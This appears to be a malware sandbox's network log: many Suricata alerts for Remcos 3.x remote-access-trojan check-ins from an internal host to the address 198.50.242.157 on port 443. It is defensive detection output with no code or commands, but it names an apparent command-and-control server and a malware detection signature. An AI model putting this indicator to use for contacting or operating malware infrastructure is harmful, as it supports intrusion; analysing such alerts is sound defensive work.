Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49847 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49781 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49849 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49775 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49768 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49747 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49770 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49832 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49841 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49787 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49798 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49789 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49795 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49779 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49870 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49780 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49859 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49873 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49759 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49767 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49808 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49838 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49811 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49884 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49883 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49860 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49804 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49826 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49878 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49888 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49831 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49861 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49871 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49814 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49799 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49749 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49874 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49872 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49809 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49892 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49797 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49897 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49906 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49903 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49810 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49868 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49743 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49910 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49800 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49801 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49790 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49882 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49934 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49938 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49942 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49894 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49833 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49945 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49949 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49813 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49951 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49918 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49957 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49886 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49751 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49927 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49913 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49786 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49772 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49946 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49965 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49823 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49973 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49975 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49964 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49796 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49785 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49914 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49850 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49794 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49992 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49990 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49994 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49944 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49996 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49806 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49997 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49969 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49901 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49852 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49862 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49919 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49885 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49937 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49911 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49978 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50022 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49764 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50025 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50024 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50027 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50033 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49982 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49908 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50035 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50011 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49920 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49943 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50037 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50007 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50046 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50034 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49924 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49956 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50018 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49955 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49925 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49989 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49971 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50057 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50058 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49948 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49979 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49970 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50065 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50063 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50068 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49987 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49864 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49936 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50028 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50042 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49947 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49916 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50084 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50088 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49977 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50080 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50052 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49985 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50002 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50032 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50040 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50004 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50066 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50100 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50010 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49941 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50017 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50000 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50054 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50003 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50083 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50117 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49950 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50070 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50140 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50060 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49966 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50020 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49988 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50099 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50021 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50038 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50067 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50061 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50145 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50124 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50051 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49900 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50085 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50077 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50013 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50126 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50127 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50082 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50036 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50134 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50014 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49961 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50133 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50023 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50072 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50138 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50107 -> 198.50.242.157:443
